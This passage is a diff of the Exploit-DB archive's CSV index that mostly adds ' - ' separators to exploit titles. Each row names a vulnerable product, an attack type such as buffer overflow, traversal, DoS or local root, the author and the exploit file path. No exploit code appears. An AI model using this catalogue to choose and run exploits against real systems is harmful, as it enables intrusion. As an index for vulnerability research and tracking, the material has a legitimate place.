Path Disclosure",2000-11-10,sozni,cgi,remote,0 +20397,platforms/cgi/remote/20397.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - Path Disclosure",2000-11-10,sozni,cgi,remote,0 20398,platforms/php/webapps/20398.txt,"MobileCartly 1.0 - Arbitrary File Deletion",2012-08-10,GoLd_M,php,webapps,0 20399,platforms/windows/remote/20399.html,"Microsoft Indexing Services for Windows 2000 - File Verification",2000-11-10,"Georgi Guninski",windows,remote,0 20400,platforms/cgi/dos/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - DoS",2000-11-10,sozni,cgi,dos,0 @@ -17735,7 +17735,7 @@ id,file,description,date,author,platform,type,port 20403,platforms/windows/dos/20403.txt,"Small HTTP server 2.0 1 - Non-Existent File DoS",2000-11-14,"403-security team",windows,dos,0 20404,platforms/beos/remote/20404.txt,"Joe Kloss RobinHood 1.1 - Buffer Overflow",2000-11-14,Vort-fu,beos,remote,0 20405,platforms/cgi/remote/20405.pl,"DCForum 1-6 - Arbitrary File Disclosure",2000-11-14,steeLe,cgi,remote,0 -20406,platforms/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 Memory Contents Disclosure",2000-11-16,CORE-SDI,multiple,remote,0 +20406,platforms/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 - Memory Contents Disclosure",2000-11-16,CORE-SDI,multiple,remote,0 20407,platforms/windows/local/20407.c,"NetcPlus SmartServer3 3.75 - Weak Encryption",2000-11-18,"Steven Alexander",windows,local,0 20408,platforms/cgi/remote/20408.txt,"Markus Triska CGIForum 1.0 - 'thesection' Directory Traversal",2000-11-20,zorgon,cgi,remote,0 20409,platforms/windows/local/20409.c,"NetcPlus BrowseGate 2.80.2 - Weak Encryption",2000-11-18,"Steven Alexander",windows,local,0 @@ -17752,7 +17752,7 @@ id,file,description,date,author,platform,type,port 20421,platforms/php/webapps/20421.txt,"ProQuiz 2.0.2 - Multiple Vulnerabilities",2012-08-11,L0n3ly-H34rT,php,webapps,0 20422,platforms/php/webapps/20422.txt,"MobileCartly 1.0 - Arbitrary File Write",2012-08-10,"Yakir Wizman",php,webapps,0 20423,platforms/cgi/remote/20423.txt,"NCSA httpd-campas 1.2 sample script",1997-07-15,"Francisco Torres",cgi,remote,0 -20425,platforms/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 Insecure Registration",2000-11-22,"Joey Maier",multiple,remote,0 +20425,platforms/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",multiple,remote,0 20426,platforms/windows/remote/20426.html,"Microsoft Internet Explorer 5.5 - Index.dat",2000-11-23,"Georgi Guninski",windows,remote,0 20427,platforms/windows/remote/20427.txt,"Microsoft Windows Media Player 7.0 - (.asx) Buffer Overflow",2000-11-22,@stake,windows,remote,0 20428,platforms/php/webapps/20428.txt,"Phorum 3.x - PHP Configuration Disclosure",2000-11-23,"Joao Gouveia",php,webapps,0 @@ -17763,12 +17763,12 @@ id,file,description,date,author,platform,type,port 20433,platforms/cgi/remote/20433.txt,"CGI City CC Whois 1.0 Metacharacter",1999-11-09,"Cody T. - hhp",cgi,remote,0 20434,platforms/cgi/remote/20434.txt,"Miva htmlscript 2.x - Directory Traversal",1998-01-26,"Dennis Moore",cgi,remote,0 20435,platforms/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x & NCSA httpd 1.x - test-cgi Directory Listing",1996-04-01,@stake,cgi,remote,0 -20436,platforms/unix/local/20436.sh,"Mac OS X 10_HP-UX 9/10/11_Mandriva 6/7_RedHat 5/6_SCO 5_IRIX 6 Shell Redirection Race Condition",2000-01-02,proton,unix,local,0 +20436,platforms/unix/local/20436.sh,"Mac OS X 10_HP-UX 9/10/11_Mandriva 6/7_RedHat 5/6_SCO 5_IRIX 6 - Shell Redirection Race Condition",2000-01-02,proton,unix,local,0 20437,platforms/windows/dos/20437.c,"Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (1)",1997-07-05,_eci,windows,dos,0 20438,platforms/windows/dos/20438.pl,"Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (2)",1997-05-07,_eci,windows,dos,0 20439,platforms/windows/dos/20439.pl,"Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (3)",1997-05-07,_eci,windows,dos,0 20440,platforms/windows/dos/20440.irc,"Windows 3.11/95/NT 4.0/NT 3.5.1 - 'Out Of Band' Data Denial of Service (4)",1997-05-07,"maddog and lerper",windows,dos,0 -20441,platforms/multiple/remote/20441.txt,"IBM Net.Data 7.0 Path Disclosure",2000-11-29,"Chad Kalmes",multiple,remote,0 +20441,platforms/multiple/remote/20441.txt,"IBM Net.Data 7.0 - Path Disclosure",2000-11-29,"Chad Kalmes",multiple,remote,0 20442,platforms/cgi/remote/20442.html,"Greg Matthews Classifieds.cgi 1.0 Hidden Variable",1998-12-15,anonymous,cgi,remote,0 20443,platforms/osx/local/20443.sh,"Tunnelblick - Local Root Exploit (2)",2012-08-11,zx2c4,osx,local,0 20444,platforms/cgi/remote/20444.txt,"Greg Matthews Classifieds.cgi 1.0 Metacharacter",1998-12-15,anonymous,cgi,remote,0 @@ -17817,7 +17817,7 @@ id,file,description,date,author,platform,type,port 20489,platforms/windows/remote/20489.txt,"keware technologies homeseer 1.4 - Directory Traversal",2000-12-07,"SNS Research",windows,remote,0 20490,platforms/unix/remote/20490.c,"BitchX IRC Client 1.0 c17 DNS Buffer Overflow",2000-12-04,nimrood,unix,remote,0 20491,platforms/multiple/remote/20491.txt,"KTH Kerberos 4 - Arbitrary Proxy Usage",2000-12-08,"Jouko Pynnonen",multiple,remote,0 -20492,platforms/unix/remote/20492.txt,"ssldump 0.9 b1 Format String",2000-12-11,c0ncept,unix,remote,0 +20492,platforms/unix/remote/20492.txt,"ssldump 0.9 b1 - Format String",2000-12-11,c0ncept,unix,remote,0 20493,platforms/linux/local/20493.sh,"University of Washington Pico 3.x/4.x - File Overwrite",2000-12-11,mat,linux,local,0 20494,platforms/linux/dos/20494.pl,"RedHat Linux 7.0 - Roaring Penguin PPPoE Denial of Service",2000-12-11,dethy,linux,dos,0 20495,platforms/unix/remote/20495.c,"Oops Proxy Server 1.4.22 - Buffer Overflow (1)",2000-12-11,CyRaX,unix,remote,0 @@ -17898,21 +17898,21 @@ id,file,description,date,author,platform,type,port 20575,platforms/windows/webapps/20575.txt,"ManageEngine OpStor 7.4 - Multiple Vulnerabilities",2012-08-17,Vulnerability-Lab,windows,webapps,0 20613,platforms/windows/dos/20613.txt,"Microsoft Windows 98/2000 UDP Socket DoS",2001-02-06,"Georgi Guninski",windows,dos,0 20576,platforms/php/webapps/20576.txt,"Inferno vBShout 2.5.2 - SQL Injection",2012-08-17,Luit,php,webapps,0 -20644,platforms/hardware/dos/20644.c,"Marconi ASX-1000 Administration Denial of Service",2001-02-19,"J.K. Garvey",hardware,dos,0 +20644,platforms/hardware/dos/20644.c,"Marconi ASX-1000 - Administration Denial of Service",2001-02-19,"J.K. Garvey",hardware,dos,0 20578,platforms/php/webapps/20578.pl,"hastymail2 webmail 1.1 rc2 - Stored XSS",2012-08-17,"Shai rod",php,webapps,0 20579,platforms/php/webapps/20579.py,"T-dah Webmail - Multiple Stored XSS",2012-08-17,"Shai rod",php,webapps,0 20580,platforms/php/webapps/20580.txt,"webid 1.0.4 - Multiple Vulnerabilities",2012-08-17,dun,php,webapps,0 20612,platforms/windows/remote/20612.txt,"informs picserver 1.0 - Directory Traversal",2001-02-05,joetesta,windows,remote,0 20581,platforms/linux/local/20581.c,"Mysql 3.22.x/3.23.x - Local Buffer Overflow",2001-01-18,"Luis Miguel Silva",linux,local,0 -20582,platforms/windows/remote/20582.c,"Icecast 1.3.7/1.3.8 print_client() Format String",2001-01-21,CyRaX,windows,remote,0 +20582,platforms/windows/remote/20582.c,"Icecast 1.3.7/1.3.8 - print_client() Format String",2001-01-21,CyRaX,windows,remote,0 20583,platforms/cgi/remote/20583.pl,"textcounter.pl 1.2 - Arbitrary Command Execution",1998-06-24,"Doru Petrescu",cgi,remote,0 20584,platforms/windows/remote/20584.txt,"fastream ftp++ 2.0 - Directory Traversal",2001-01-22,"SNS Research",windows,remote,0 20585,platforms/windows/local/20585.txt,"localweb2000 1.1 - Directory Traversal",2001-01-22,"SNS Research",windows,local,0 -20586,platforms/php/webapps/20586.txt,"Phorum 3.0.7 admin.php3 Unverified Administrative Password Change",2000-01-06,"Max Vision",php,webapps,0 -20587,platforms/php/webapps/20587.txt,"Phorum 3.0.7 violation.php3 - Arbitrary Email Relay",2000-01-01,"Max Vision",php,webapps,0 +20586,platforms/php/webapps/20586.txt,"Phorum 3.0.7 - admin.php3 Unverified Administrative Password Change",2000-01-06,"Max Vision",php,webapps,0 +20587,platforms/php/webapps/20587.txt,"Phorum 3.0.7 - violation.php3 Arbitrary Email Relay",2000-01-01,"Max Vision",php,webapps,0 20588,platforms/php/webapps/20588.txt,"Phorum 3.0.7 - auth.php3 Backdoor Vulnerabililty",2000-01-06,"Max Vision",php,webapps,0 20589,platforms/windows/dos/20589.c,"eEye Digital Security IRIS 1.0.1 - GET Denial of Service",2001-01-21,grazer,windows,dos,0 -20590,platforms/windows/remote/20590.txt,"Microsoft IIS 3.0/4.0 Upgrade BDIR.HTR",1998-12-25,"rain forest puppy",windows,remote,0 +20590,platforms/windows/remote/20590.txt,"Microsoft IIS 3.0/4.0 - Upgrade BDIR.HTR",1998-12-25,"rain forest puppy",windows,remote,0 20591,platforms/multiple/remote/20591.txt,"Netscape Enterprise Server 3.0/4.0 - 'Index' Disclosure",2001-01-24,"Security Research Team",multiple,remote,0 20592,platforms/jsp/remote/20592.txt,"Oracle 8.1.7 JSP/JSPSQL Remote File Reading",2000-01-22,"Georgi Guninski",jsp,remote,0 20593,platforms/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x - ipfw Filtering Evasion",2001-01-23,"Aragon Gouveia",freebsd,remote,0 @@ -17931,7 +17931,7 @@ id,file,description,date,author,platform,type,port 20606,platforms/cgi/remote/20606.pl,"qDecoder 4.x/5.x - Remote Buffer Overflow",2000-03-26,"Jin Ho You",cgi,remote,0 20607,platforms/windows/remote/20607.txt,"goahead webserver 2.0/2.1 - Directory Traversal",2001-02-02,"Sergey Nenashev",windows,remote,0 20608,platforms/windows/remote/20608.txt,"guido frassetto sedum http server 2.0 - Directory Traversal",2001-02-04,"Joe Testa",windows,remote,0 -20609,platforms/cgi/remote/20609.txt,"Heat-On HSWeb Web Server 2.0 Path Disclosure",2001-02-04,"Joe Testa",cgi,remote,0 +20609,platforms/cgi/remote/20609.txt,"Heat-On HSWeb Web Server 2.0 - Path Disclosure",2001-02-04,"Joe Testa",cgi,remote,0 20610,platforms/multiple/dos/20610.txt,"Allaire JRun 3.0 Servlet DoS",2000-10-31,"Allaire Security",multiple,dos,0 20611,platforms/cgi/remote/20611.txt,"anaconda foundation 1.4-1.9 - Directory Traversal",2000-10-13,pestilence,cgi,remote,0 20614,platforms/windows/remote/20614.txt,"aolserver 3.2 Win32 - Directory Traversal",2001-02-06,joetesta,windows,remote,0 @@ -17944,7 +17944,7 @@ id,file,description,date,author,platform,type,port 20621,platforms/unix/local/20621.txt,"Micro Focus Cobol 4.1 - Arbitrary Command Execution",2001-02-12,"Dixie Flatline",unix,local,0 20622,platforms/linux/remote/20622.c,"Xmail 0.5/0.6 CTRLServer Remote Arbitrary Commands",2001-02-01,isno,linux,remote,0 20623,platforms/cgi/remote/20623.txt,"carey internets services commerce.cgi 2.0.1 - Directory Traversal",2001-02-12,slipy,cgi,remote,0 -20624,platforms/windows/remote/20624.rb,"Adobe Flash Player 11.3 Font Parsing Code Execution",2012-08-20,Metasploit,windows,remote,0 +20624,platforms/windows/remote/20624.rb,"Adobe Flash Player 11.3 - Font Parsing Code Execution",2012-08-20,Metasploit,windows,remote,0 20625,platforms/multiple/remote/20625.txt,"SilverPlatter WebSPIRS 3.3.1 - File Disclosure",2001-02-12,cuctema,multiple,remote,0 20626,platforms/linux/local/20626.c,"Linux Kernel 2.2.x - sysctl() Memory Reading Proof of Concept",2001-02-09,"Chris Evans",linux,local,0 20627,platforms/php/webapps/20627.py,"IlohaMail Webmail Stored XSS",2012-08-18,"Shai rod",php,webapps,0 @@ -17960,9 +17960,9 @@ id,file,description,date,author,platform,type,port 20637,platforms/windows/remote/20637.txt,"itafrica webactive 1.0 - Directory Traversal",2001-02-16,slipy,windows,remote,0 20638,platforms/multiple/remote/20638.txt,"Bajie Webserver 0.78/0.90 - Remote Command Execution",2001-02-15,joetesta,multiple,remote,0 20639,platforms/multiple/remote/20639.txt,"Bajie 0.78 - Arbitrary Shell Command Execution",2001-02-15,joetesta,multiple,remote,0 -20640,platforms/windows/remote/20640.txt,"Working Resources BadBlue 1.2.7 Path Disclosure",2001-02-20,"SNS Research",windows,remote,0 -20641,platforms/windows/dos/20641.txt,"Working Resources BadBlue 1.2.7 DoS",2001-02-20,"SNS Research",windows,dos,0 -20642,platforms/cgi/remote/20642.pl,"Adcycle 0.77/0.78 AdLibrary.pm Session Access",2001-02-19,"Neil K",cgi,remote,0 +20640,platforms/windows/remote/20640.txt,"Working Resources BadBlue 1.2.7 - Path Disclosure",2001-02-20,"SNS Research",windows,remote,0 +20641,platforms/windows/dos/20641.txt,"Working Resources BadBlue 1.2.7 - DoS",2001-02-20,"SNS Research",windows,dos,0 +20642,platforms/cgi/remote/20642.pl,"Adcycle 0.77/0.78 - AdLibrary.pm Session Access",2001-02-19,"Neil K",cgi,remote,0 20643,platforms/windows/webapps/20643.txt,"ManageEngine OpUtils 6.0 - Stored XSS",2012-08-18,loneferret,windows,webapps,7080 20645,platforms/linux/local/20645.c,"Elm 2.5.3 Alternative-Folder Buffer Overflow",2001-02-13,_kiss_,linux,local,0 20646,platforms/unix/remote/20646.c,"LICQ 0.85/1.0.1/1.0.2 - Remote Buffer Overflow",2000-12-26,"Stan Bubrouski",unix,remote,0 @@ -17972,9 +17972,9 @@ id,file,description,date,author,platform,type,port 20650,platforms/windows/dos/20650.txt,"Sapio WebReflex 1.55 GET Denial of Service",2001-02-27,slipy,windows,dos,0 20651,platforms/windows/local/20651.txt,"datawizards ftpxq 2.0.93 - Directory Traversal",2001-02-28,joetesta,windows,local,0 20652,platforms/hardware/remote/20652.txt,"Cisco IOS 11.x/12.0 ILMI SNMP Community String",2001-02-27,pask,hardware,remote,0 -20653,platforms/windows/remote/20653.txt,"SunFTP 1.0 Build 9 Unauthorized File Access",2001-03-02,se00020,windows,remote,0 +20653,platforms/windows/remote/20653.txt,"SunFTP 1.0 Build 9 - Unauthorized File Access",2001-03-02,se00020,windows,remote,0 20654,platforms/hardware/dos/20654.pl,"APC WEB/SNMP Management Card (9606) Firmware 3.0 - Telnet Administration DoS",2001-02-26,altomo,hardware,dos,0 -20655,platforms/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 DoS",2001-02-27,slipy,windows,dos,0 +20655,platforms/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 - DoS",2001-02-27,slipy,windows,dos,0 20656,platforms/windows/dos/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service",2001-02-27,slipy,windows,dos,0 20657,platforms/windows/remote/20657.txt,"robin twombly a1 http server 1.0 - Directory Traversal",2001-02-27,slipy,windows,remote,0 20658,platforms/unix/local/20658.txt,"Joe Text Editor 2.8 - (.joerc) Arbitrary Command Execution",2001-02-28,"Wkit Security",unix,local,0 @@ -18001,7 +18001,7 @@ id,file,description,date,author,platform,type,port 20678,platforms/unix/local/20678.c,"Rob Malda ASCDC 0.3 - Buffer Overflow (1)",2001-03-08,anonymous,unix,local,0 20679,platforms/unix/local/20679.c,"Rob Malda ASCDC 0.3 - Buffer Overflow (2)",2001-03-08,"the itch",unix,local,0 20680,platforms/windows/remote/20680.html,"Microsoft Internet Explorer 5.0.1/5.5/6.0 Telnet Client File Overwrite",2001-03-09,"Oliver Friedrichs",windows,remote,0 -20681,platforms/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 DoS",2001-01-22,honoriak,windows,dos,0 +20681,platforms/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 - DoS",2001-01-22,honoriak,windows,dos,0 20682,platforms/windows/dos/20682.txt,"Michael Lamont Savant Web Server 3.0 - DoS",2001-03-09,Phiber,windows,dos,0 20683,platforms/cgi/remote/20683.txt,"Ikonboard 2.1.7 b Remote File Disclosure",2001-03-11,"Martin J. Muench",cgi,remote,0 20684,platforms/solaris/local/20684.c,"Solaris 2.5/2.6/7.0/8 tip Buffer Overflow",2001-03-27,"Pablo Sor",solaris,local,0 @@ -18031,7 +18031,7 @@ id,file,description,date,author,platform,type,port 20720,platforms/linux/local/20720.c,"Linux Kernel 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (1)",2001-03-27,"Wojciech Purczynski",linux,local,0 20721,platforms/linux/local/20721.c,"Linux Kernel 2.2.18 (RH 7.0/6.2 & 2.2.14 / 2.2.18 / 2.2.18ow4) - ptrace/execve Race Condition Local Root (2)",2001-03-27,"Wojciech Purczynski",linux,local,0 20722,platforms/multiple/remote/20722.txt,"Caucho Technology Resin 1.2/1.3 JavaBean Disclosure",2001-04-03,lovehacker,multiple,remote,0 -20723,platforms/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 User Credentials Disclosure",2001-04-03,"Rob Beck",windows,remote,0 +20723,platforms/windows/remote/20723.pl,"Gene6 BPFTP FTP Server 2.0 - User Credentials Disclosure",2001-04-03,"Rob Beck",windows,remote,0 20724,platforms/hp-ux/local/20724.txt,"Shareplex 2.1.3.9/2.2.2 beta - Arbitrary Local File Disclosure",2001-03-30,"Dixie Flatline",hp-ux,local,0 20725,platforms/cgi/remote/20725.txt,"Microburst uStorekeeper 1.x - Remote Arbitrary Commands",2001-04-02,"UkR hacking team",cgi,remote,0 20726,platforms/windows/remote/20726.pl,"Gene6 BPFTP Server 2.0 - File Existence Disclosure",2001-04-03,"Rob Beck",windows,remote,0 @@ -18113,7 +18113,7 @@ id,file,description,date,author,platform,type,port 20806,platforms/hardware/remote/20806.txt,"Tektronix Phaser 740/750/850/930 Network Printer Administration Interface",2001-04-25,Ltlw0lf,hardware,remote,0 20807,platforms/multiple/remote/20807.txt,"datawizard webxq 2.1.204 - Directory Traversal",2001-04-27,joetesta,multiple,remote,0 20808,platforms/cgi/remote/20808.txt,"PerlCal 2.x - Directory Traversal",2001-04-27,ThePike,cgi,remote,0 -20809,platforms/cgi/remote/20809.html,"Excite for Web Servers 1.1 Administrative Password",1998-11-30,"Michael Gerdts",cgi,remote,0 +20809,platforms/cgi/remote/20809.html,"Excite for Web Servers 1.1 - Administrative Password",1998-11-30,"Michael Gerdts",cgi,remote,0 20810,platforms/multiple/dos/20810.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - 'land.c' loopback DoS (1)",1997-11-20,m3lt,multiple,dos,0 20811,platforms/multiple/dos/20811.cpp,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - 'land.c' loopback DoS (2)",1997-11-20,"Konrad Malewski",multiple,dos,0 20812,platforms/windows/dos/20812.c,"FreeBSD 2.x_HP-UX 9/10/11_kernel 2.0.3_Windows NT 4.0/Server 2003_NetBSD 1 - 'land.c' loopback DoS (3)",1997-11-20,m3lt,windows,dos,0 @@ -18151,7 +18151,7 @@ id,file,description,date,author,platform,type,port 20844,platforms/osx/dos/20844.txt,"Apple Personal Web Sharing 1.1/1.5/1.5.5 - Remote DoS",2001-05-10,"Jass Seljamaa",osx,dos,0 20845,platforms/osx/dos/20845.txt,"Maxum Rumpus FTP Server 1.3.2/1.3.4/2.0.3 dev - Remote DoS",2001-05-15,"Jass Seljamaa",osx,dos,0 20846,platforms/windows/dos/20846.pl,"Microsoft IIS 4.0/5.0 FTP Denial of Service",2000-05-14,"Nelson Bunker",windows,dos,0 -20847,platforms/hardware/dos/20847.c,"3Com OfficeConnect DSL Router 812 1.1.7/840 1.1.7 HTTP Port Router DoS",2001-09-21,Sniffer,hardware,dos,0 +20847,platforms/hardware/dos/20847.c,"3Com OfficeConnect DSL Router 812 1.1.7/840 1.1.7 - HTTP Port Router DoS",2001-09-21,Sniffer,hardware,dos,0 20848,platforms/php/webapps/20848.txt,"PHPSlash 0.5.3 2/0.6.1 URL Block Arbitrary File Disclosure",2001-04-15,"tobozo tagada",php,webapps,0 20849,platforms/cgi/remote/20849.pl,"DCForum 6.0 - Remote Admin Privilege Compromise",2001-05-08,"Franklin DeMatto",cgi,remote,0 20850,platforms/windows/remote/20850.txt,"Pacific Software Carello 1.2.1 Shopping Cart Command Execution",2001-05-14,"Peter Gründl",windows,remote,0 @@ -18191,7 +18191,7 @@ id,file,description,date,author,platform,type,port 20887,platforms/cgi/remote/20887.txt,"Cosmicperl Directory Pro 2.0 - Arbitrary File Disclosure",2001-05-28,Marshal,cgi,remote,0 20888,platforms/windows/remote/20888.txt,"Qualcomm Eudora 5.1 Hidden Attachment Execution",2001-05-29,http-equiv,windows,remote,0 20889,platforms/multiple/remote/20889.txt,"GNU Privacy Guard 1.0.x - Format String",2001-05-29,"fish stiqz",multiple,remote,0 -20890,platforms/multiple/remote/20890.txt,"Aladdin Knowledge Systems eSafe Gateway 3.0 HTML tag Script-filtering Bypass",2001-05-29,"eDvice Security Services",multiple,remote,0 +20890,platforms/multiple/remote/20890.txt,"Aladdin Knowledge Systems eSafe Gateway 3.0 - HTML tag Script-filtering Bypass",2001-05-29,"eDvice Security Services",multiple,remote,0 20891,platforms/multiple/remote/20891.txt,"Aladdin Knowledge Systems eSafe Gateway 3.0 Unicode Script-filtering Bypass",2001-05-29,"eDvice Security Services",multiple,remote,0 20892,platforms/hardware/remote/20892.txt,"Olicom XLT-F XL 80 IM V5.5BL2 - Undocumented Community String",2001-03-25,"Jacek Lipkowski",hardware,remote,0 20893,platforms/windows/remote/20893.txt,"Trend Micro InterScan VirusWall for Windows NT 3.4/3.5/3.51 - Remote Reconfiguration",2001-05-24,snsadv,windows,remote,0 @@ -18215,7 +18215,7 @@ id,file,description,date,author,platform,type,port 20911,platforms/osx/remote/20911.txt,"Apache 1.3.14 Mac File Protection Bypass",2001-06-10,"Stefan Arentz",osx,remote,0 20912,platforms/windows/remote/20912.txt,"Trend Micro InterScan VirusWall for Windows NT 3.51 Configurations Modification",2001-06-12,"SNS Advisory",windows,remote,0 20913,platforms/php/webapps/20913.txt,"Disqus Blog Comments Blind SQL Injection",2012-08-29,Spy_w4r3,php,webapps,0 -20914,platforms/cgi/remote/20914.pl,"cgiCentral WebStore 400 Administrator Authentication Bypass",2001-05-06,"Igor Dobrovitski",cgi,remote,0 +20914,platforms/cgi/remote/20914.pl,"cgiCentral WebStore 400 - Administrator Authentication Bypass",2001-05-06,"Igor Dobrovitski",cgi,remote,0 20915,platforms/windows/local/20915.py,"ActFax Server 4.31 Build 0225 - Local Privilege Escalation Exploit",2012-08-29,"Craig Freyman",windows,local,0 20916,platforms/cgi/remote/20916.pl,"cgiCentral WebStore 400 - Arbitrary Command Execution",2001-05-06,"Igor Dobrovitski",cgi,remote,0 20917,platforms/windows/dos/20917.txt,"Winlog Lite SCADA HMI system SEH 0verwrite",2012-08-29,Ciph3r,windows,dos,0 @@ -18240,7 +18240,7 @@ id,file,description,date,author,platform,type,port 20938,platforms/cgi/remote/20938.txt,"DC Scripts DCShop Beta 1.0 02 - File Disclosure (1)",2001-06-18,"Peter Helms",cgi,remote,0 20939,platforms/cgi/remote/20939.txt,"DC Scripts DCShop Beta 1.0 02 - File Disclosure (2)",2001-06-18,"Peter Helms",cgi,remote,0 20940,platforms/cgi/remote/20940.txt,"Tarantella Enterprise 3 3.x - TTAWebTop.CGI Arbitrary File Viewing",2001-06-18,kf,cgi,remote,0 -20941,platforms/freebsd/remote/20941.pl,"W3M 0.1/0.2 Malformed MIME Header Buffer Overflow",2001-06-19,White_E,freebsd,remote,0 +20941,platforms/freebsd/remote/20941.pl,"W3M 0.1/0.2 - Malformed MIME Header Buffer Overflow",2001-06-19,White_E,freebsd,remote,0 20942,platforms/php/webapps/20942.html,"Booking System Pro CSRF",2012-08-30,DaOne,php,webapps,0 20945,platforms/solaris/local/20945.txt,"Sun SunVTS 4.x - PTExec Buffer Overflow",2001-06-21,"Pablo Sor",solaris,local,0 20946,platforms/windows/dos/20946.txt,"Cerberus FTP Server 1.x - Buffer Overflow DoS",2001-06-21,"Cartel Informatique Security Research Labs",windows,dos,0 @@ -18296,11 +18296,11 @@ id,file,description,date,author,platform,type,port 20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",php,webapps,0 20997,platforms/multiple/dos/20997.c,"HP-UX 11_Linux Kernel 2.4_Windows 2000/NT 4.0_IRIX 6.5 - Small TCP MSS DoS",2001-07-07,"Darren Reed",multiple,dos,0 20998,platforms/linux/remote/20998.c,"xloadimage 4.1 - Buffer Overflow",2001-07-10,"zenith parsec",linux,remote,0 -20999,platforms/hardware/local/20999.c,"Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation (1)",2001-07-10,"Charles Stevenson",hardware,local,0 -21000,platforms/hardware/local/21000.sh,"Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation (2)",2001-07-10,ml85p,hardware,local,0 -21001,platforms/hardware/local/21001.txt,"Samsung ml85p Printer Driver 1.0 Insecure Temporary File Creation (3)",2001-07-10,ml85p,hardware,local,0 +20999,platforms/hardware/local/20999.c,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (1)",2001-07-10,"Charles Stevenson",hardware,local,0 +21000,platforms/hardware/local/21000.sh,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (2)",2001-07-10,ml85p,hardware,local,0 +21001,platforms/hardware/local/21001.txt,"Samsung ml85p Printer Driver 1.0 - Insecure Temporary File Creation (3)",2001-07-10,ml85p,hardware,local,0 21002,platforms/multiple/remote/21002.txt,"Apache 1.3 - Possible Directory Index Disclosure",2001-07-10,Kevin,multiple,remote,0 -21003,platforms/windows/remote/21003.txt,"Microsoft Outlook 98/2000/2002 Unauthorized Email Access",2001-07-12,"Georgi Guninski",windows,remote,0 +21003,platforms/windows/remote/21003.txt,"Microsoft Outlook 98/2000/2002 - Unauthorized Email Access",2001-07-12,"Georgi Guninski",windows,remote,0 21004,platforms/windows/remote/21004.txt,"Microsoft Outlook 98/2000/2002 - Arbitrary Code Execution",2001-07-12,"Georgi Guninski",windows,remote,0 21005,platforms/php/webapps/21005.txt,"admidio 2.3.5 - Multiple Vulnerabilities",2012-09-02,"Stefan Schurtz",php,webapps,0 21006,platforms/windows/dos/21006.txt,"MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2 & 5.2.1 - File Scanner Malicious Archive DoS",2001-07-12,"Michel Arboi",windows,dos,0 @@ -18308,7 +18308,7 @@ id,file,description,date,author,platform,type,port 21008,platforms/cgi/remote/21008.txt,"interactive story 1.3 - Directory Traversal",2001-07-15,qDefense,cgi,remote,0 21009,platforms/windows/remote/21009.c,"ArGoSoft FTP Server 1.2.2.2 - Weak Password Encryption",2001-07-12,byterage,windows,remote,0 21010,platforms/linux/local/21010.sh,"XFree86 X11R6 3.3.2 XMan ManPath Environment Variable Buffer Overflow",2001-06-11,kf,linux,local,0 -21011,platforms/hardware/remote/21011.pl,"3Com SuperStack II PS Hub 40 TelnetD Weak Password Protection",2001-07-12,Siberian,hardware,remote,0 +21011,platforms/hardware/remote/21011.pl,"3Com SuperStack II PS Hub 40 - TelnetD Weak Password Protection",2001-07-12,Siberian,hardware,remote,0 21012,platforms/multiple/dos/21012.c,"ID Software Quake 1.9 - Denial of Service",2001-07-17,"Andy Gavin",multiple,dos,0 21014,platforms/linux/local/21014.c,"Slackware 7.0/7.1/8.0 - Manual Page Cache File Creation",2001-07-17,josh,linux,local,0 21015,platforms/hardware/remote/21015.pl,"Check Point Firewall-1 4 SecureRemote Network Information Leak",2001-07-17,"Haroon Meer & Roelof Temmingh",hardware,remote,0 @@ -18320,8 +18320,8 @@ id,file,description,date,author,platform,type,port 21023,platforms/cgi/remote/21023.c,"CGIWrap 2.x/3.x - Cross-Site Scripting",2001-07-22,"TAKAGI Hiromitsu",cgi,remote,0 21024,platforms/solaris/local/21024.c,"Solaris 2.6/7.0 DTMail Mail Environment Variable Buffer Overflow",2001-07-24,"NSFOCUS Security Team",solaris,local,0 21025,platforms/multiple/remote/21025.txt,"Proxomitron Naoko-4 - Cross-Site Scripting",2001-07-24,"TAKAGI Hiromitsu",multiple,remote,0 -21026,platforms/multiple/remote/21026.txt,"Sambar Server 4.4/5.0 pagecount File Overwrite",2001-07-22,kyprizel,multiple,remote,0 -21027,platforms/multiple/remote/21027.txt,"Sambar Server 4.x/5.0 Insecure Default Password Protection",2001-07-25,3APA3A,multiple,remote,0 +21026,platforms/multiple/remote/21026.txt,"Sambar Server 4.4/5.0 - pagecount File Overwrite",2001-07-22,kyprizel,multiple,remote,0 +21027,platforms/multiple/remote/21027.txt,"Sambar Server 4.x/5.0 - Insecure Default Password Protection",2001-07-25,3APA3A,multiple,remote,0 21028,platforms/hardware/dos/21028.pl,"Cisco IOS 12 - UDP Denial of Service",2001-07-25,blackangels,hardware,dos,0 21029,platforms/multiple/remote/21029.pl,"Softek MailMarshal 4_Trend Micro ScanMail 1.0 SMTP Attachment Protection 